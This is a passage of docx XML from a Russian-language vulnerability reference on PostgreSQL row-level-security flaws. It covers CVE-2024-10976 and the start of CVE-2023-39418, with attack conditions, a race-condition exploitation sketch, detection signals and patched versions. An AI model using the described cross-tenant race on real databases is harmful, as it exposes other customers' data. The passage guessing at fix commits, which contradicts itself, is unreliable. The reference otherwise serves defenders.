          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># делает первый запрос (Шаг 1) — plan кэшируется с RLS tenant_42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># дальше через любой механизм (request-flood до collision, race в pool) попадает в сессию,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># где другой role (например, admin_role) исполняет тот же endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Реальный exploit — race condition в connection pool: атакующий замечает, что приложение использует pool, и massive concurrent requests увеличивают шанс на collision (connection-reuse между разных tenants за окно reset).</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Cross-tenant data leak: tenant видит aggregated данные другого tenant через cached plan. В worst case — массовый exfil через subquery-патерны (CTE с RETURNING, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH x AS (SELECT * FROM rls_table) ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). CVE advisory отмечает: *"BUG #18244: A reset-only path of plpgsql cached plan and inner SELECT may report incorrect rows for a different ROLE than expected."*</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auto_explain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: log с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter: (tenant_id = &lt;wrong-tenant&gt;)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RLS expression от чужого tenant.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один query-text, но result-rows variation между sessions с разными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 поведенческий сигнал.</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Application-логи: tenant видит «лишние» counts/rows, которые не принадлежат ему — детекция через cross-row consistency checks.</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Технически CVE-2024-10976 — баг в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plan invalidation path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при SET ROLE на cached plans, содержащих RLS-protected subquery/CTE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В PostgreSQL plan-cache работает так:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Первый Execute prepared statement (или SQL through extended protocol с auto-prep) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">парсит, оптимизирует, кэширует plan</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2. Последующие Execute </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">reuse plan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, если signature совпадает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. При invalidation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE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ALTER POLICY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plan должен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">invalidate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — на следующем Execute план перестраивается.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bug: для RLS-protected таблиц, читаемых из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">subquery / CTE / security invoker view / SQL function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, путь invalidation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">пропускал re-planning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для inner RLS-expression. SET ROLE менял current_user, но subquery scan продолжал использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">expanded RLS-expression первой роли</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Источник в PostgreSQL git — commit для CVE-2024-10976 (доступен в release notes 17.1): *"Restrict visibility of pg_stats_ext and pg_stats_ext_exprs entries to the table owner"* — нет, это для CVE-2024-4317. Для CVE-2024-10976: commit message *"Fix incorrect parent's expression-list assignment in transformSetOperationTree"* — не относится. Точный commit найти трудно без точного хэша, но advisory указывает на исправление в commit для 17.1/16.5/15.9/14.14/13.17/12.21.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Цепочка предшествующих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CVE-2016-2193</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — plpgsql cached plan reset upon role change для трansaction-modifying statements.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CVE-2023-2455</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — security definer plus row security — RLS apply wrong row для security barrier views в специфичных сценариях.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CVE-2024-10976</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — продолжение того же класса, теперь для subquery/CTE/SQL function paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">upgrade на minor PG-версию с фиксом</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="fals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Major</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Уязвимая</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 фикса</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16.4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15.8</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14.13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13.16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12.20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 (EOL ветка)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Workaround для непатченных систем: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Connection-per-tenant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: dedicated connection (без pool) на каждого tenant. Это убивает performance, но физически блокирует cross-tenant cache reuse.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DISCARD ALL после RESET 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DISCARD ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обнуляет plan-cache, query-results, prepared statements. Performance overhead заметный.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Принудительный DEALLOCATE ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: только обнуляет prepared statements, не affecting auto-prep cache.</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 17.0, 16.4, 15.8, 14.13, 13.16, 12.20.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валидный tenant-role с access к RLS-protected таблице. Для realistic exploit — application использует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per-request + connection pool + query contains subquery/CTE/security invoker view с RLS-table.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subquery / WITH / SQL-language function на RLS-таблицу + connection-pool reuse + plan-cache enabled (default).</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CVE-2024-10976</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 per PostgreSQL Project)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ноября 2024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 17.0, 16.4, 15.8, 14.13, 13.16, 12.20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17.1, 16.5, 15.9, 14.14, 13.17, 12.21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Incorrect privilege assignment в plan-cache reuse под SET ROLE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 через subquery/CTE/SQL function paths</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Multi-tenant приложения с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per-request — стандартный pattern для PostgreSQL-based SaaS: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AuthZ через role identity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: tenant_X отображается в database-role tenant_X, RLS policy filter по current_user или session-variable.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Connection pooling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: shared connections с SET ROLE — снижает overhead создания соединений.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Subquery / CTE в reports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: обычный pattern для dashboards с aggregates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сочетание этих трёх — производит CVE-2024-10976. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не сам сценарий проблема</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а bug в plan invalidation. Корректный setup на patched PG-версии работает безопасно.</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`auto_explain` log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Filter: (tenant_id = X)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> где X не равен текущему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-target — индикатор stale plan.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один query-text с widely-varying rows-returned между sessions — поведенческая аномалия.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Application-логи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: tenant видит «extra» rows, которые не должен — обычно обнаруживается через customer complaints.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version check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: deployment scripts проверяют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT version()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для confirmation что minor patched.</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Уязвимы все ветки до фиксов 14.11.2024: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Ветка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 до</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16.5</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13.17</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12.21 (последний minor — 12.22 после EOL 14.11.2024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На версиях после фикса — bug закрыт, plan invalidates корректно при SET ROLE для всех RLS paths.</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 SET ROLE / CVE-2024-10978</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — оба CVE опубликованы 14.11.2024, оба связаны с SET ROLE-paths. Граница: 3.13.1 — получение чужой роли в context = privilege escalation; 3.17.1 — чтение данных через cached RLS-filter = data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3.17.3 SET ROLE reset (CVE-2024-10978)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — connected CVE того же batch.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3.17.5 SECURITY DEFINER функции и RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — alternative bypass через SD functions.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parallel class пр. esc. в SD-функциях.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 Хронология 2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст batch CVE 14.11.2024 (10976/10977/10978/10979).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как defence-in-depth.</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CVE-2024-10976 — https://www.postgresql.org/support/security/CVE-2024-10976/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17.1 Release Notes (Security Fixes) — https://www.postgresql.org/docs/release/17.1/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NIST NVD: CVE-2024-10976 — https://nvd.nist.gov/vuln/detail/CVE-2024-10976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«Row Security Policies» — https://www.postgresql.org/docs/current/ddl-rowsecurity.html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«Plan Caching» — https://www.postgresql.org/docs/current/plpgsql-implementation.html#PLPGSQL-PLAN-CACHING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pganalyze blog: «PostgreSQL 17.1 security fixes» (CVE-2024-10976 / 10977 / 10978 / 10979) — https://pganalyze.com/blog/5mins-postgres-17-1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R9 (sources/research.md, строки 172–184)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.17.2 MERGE не применяет UPDATE/SELECT policy (R11, CVE-2023-39418)</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MERGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — операция «upsert»-стиля, появившаяся в PostgreSQL 15.0 (октябрь 2022). Объединяет SELECT (для определения совпадения), INSERT (для не-matched), UPDATE/DELETE (для matched) в одном statement. В PG 15.0–15.3 (фикс в 15.4 — 10.08.2023) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MERGE не применял UPDATE/SELECT-полиции RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий мог через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MERGE INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> записать строку, которая нарушает существующую UPDATE-policy запрета (например, изменить tenant ownership). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">узкое окно ~10 месяцев</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (релиз 15.0 13.10.2022, фикс 15.4 10.08.2023), но критичное: новые pg-deployments, не обновлявшиеся в первые 10 месяцев существования 15.x ветки, уязвимы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2023-39418 — единственный SEC-bug по MERGE в открытой history. После 15.4 поведение MERGE корректное: применяются все relevant policies, как для INSERT (WITH CHECK), так и для UPDATE/SELECT (USING).</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Setup для multi-tenant orders с RLS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE app.orders (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    id int PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
